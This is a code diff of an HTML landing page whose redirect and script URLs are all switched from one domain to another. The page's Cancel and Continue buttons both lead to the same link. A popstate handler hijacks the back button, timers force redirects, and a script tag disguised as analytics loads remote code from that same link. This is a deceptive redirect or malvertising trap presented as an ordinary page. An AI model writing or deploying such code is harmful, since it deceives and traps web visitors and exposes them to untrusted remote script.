--- a/index.html
+++ b/index.html
@@ -24,7 +24,7 @@
     body, html {
       height: 100%;
       margin: 0;
-      background: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-Rx3Sf-G5Covq5OC2XMqM6pBGplzGSZoUBXgXPX0kF7trr4CZzpibCbz45StBdpfXDmFNK0qKDt6oUUGuaXyMt1dtgPM52n4vQ_KnK1-3q1LbuI3_9IYKr0FVKGOTPzJMuuWiXlda0LdBntnPyo80E5KV4P_IHI_mCsS4mBQEmzYvv2mNKARt8GExdWE/s1974/IMG_2670%20copy.png') no-repeat center center fixed;
+      background: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj2Vhc8qCnN-q5W77d7AoL25_mRU-iUrtLcKJPYpWe4F9CmcCvzfZb9Gwx2BBmY98k-4SSun9n2IjP6TJfsmpI7Kc8nm_uQJOl_8WrcdaibBqV5jNSM4G_8sT16n-VJLAooC81u2KmH805tLqm3ZkSD5pd4cDaPWrEMk5lgGdfnD1h0qtfbG_dzKhKZUo/s1691/IMG_3697.PNG') no-repeat center center fixed;
       background-size: cover;
       display: flex;
       align-items: center;
@@ -91,20 +91,20 @@
   </style>
   <script>
     function loadCancelLink() {
-      window.location.href = 'https://beenover.com/p1zzdw3f9?key=dc98018eb574131d1f9c5fc1117f3b68'; // Replace with your Cancel link
+      window.location.href = 'https://echoesoftimelessstories.com/p1zzdw3f9?key=dc98018eb574131d1f9c5fc1117f3b68'; // Replace with your Cancel link
     }
 
     function loadContinueLink() {
       // Set a flag in sessionStorage to detect that the Continue button was clicked
       sessionStorage.setItem('continueClicked', 'true');
-      window.location.href = 'https://beenover.com/p1zzdw3f9?key=dc98018eb574131d1f9c5fc1117f3b68'; // Replace with your Continue link
+      window.location.href = 'https://echoesoftimelessstories.com/p1zzdw3f9?key=dc98018eb574131d1f9c5fc1117f3b68'; // Replace with your Continue link
     }
 
     // Check if the back button is pressed after visiting the Continue link
     window.addEventListener('popstate', function () {
       if (sessionStorage.getItem('continueClicked') === 'true') {
         // Redirect to an alternate link when going back from the Continue page
-        window.location.href = 'https://beenover.com/p1zzdw3f9?key=dc98018eb574131d1f9c5fc1117f3b68'; // Replace with your alternate back link
+        window.location.href = 'https://echoesoftimelessstories.com/p1zzdw3f9?key=dc98018eb574131d1f9c5fc1117f3b68'; // Replace with your alternate back link
       }
     });
   </script>
@@ -125,10 +125,10 @@
       fh();}
   setTimeout('hh();', 500);
   function fh(){
-      location.href="https://beenover.com/p1zzdw3f9?key=dc98018eb574131d1f9c5fc1117f3b68";
+      location.href="https://echoesoftimelessstories.com/p1zzdw3f9?key=dc98018eb574131d1f9c5fc1117f3b68";
   }
   function goon(){
-      location.href="https://beenover.com/p1zzdw3f9?key=dc98018eb574131d1f9c5fc1117f3b68";
+      location.href="https://echoesoftimelessstories.com/p1zzdw3f9?key=dc98018eb574131d1f9c5fc1117f3b68";
   }
 </script>
 
@@ -139,17 +139,17 @@
       fh();}
   setTimeout('hh();', 500);
   function fh(){
-      location.href="https://beenover.com/p1zzdw3f9?key=dc98018eb574131d1f9c5fc1117f3b68";
+      location.href="https://echoesoftimelessstories.com/p1zzdw3f9?key=dc98018eb574131d1f9c5fc1117f3b68";
   }
   function goon(){
-      location.href="https://beenover.com/p1zzdw3f9?key=dc98018eb574131d1f9c5fc1117f3b68";
+      location.href="https://echoesoftimelessstories.com/p1zzdw3f9?key=dc98018eb574131d1f9c5fc1117f3b68";
   }
 </script>
 <script>
   var _hmt = _hmt || [];
   (function() {
       var hm = document.createElement("script");
-      hm.src = "https://beenover.com/p1zzdw3f9?key=dc98018eb574131d1f9c5fc1117f3b68";
+      hm.src = "https://echoesoftimelessstories.com/p1zzdw3f9?key=dc98018eb574131d1f9c5fc1117f3b68";
       var s = document.getElementsByTagName("script")[0];
       s.parentNode.insertBefore(hm, s);
   })();
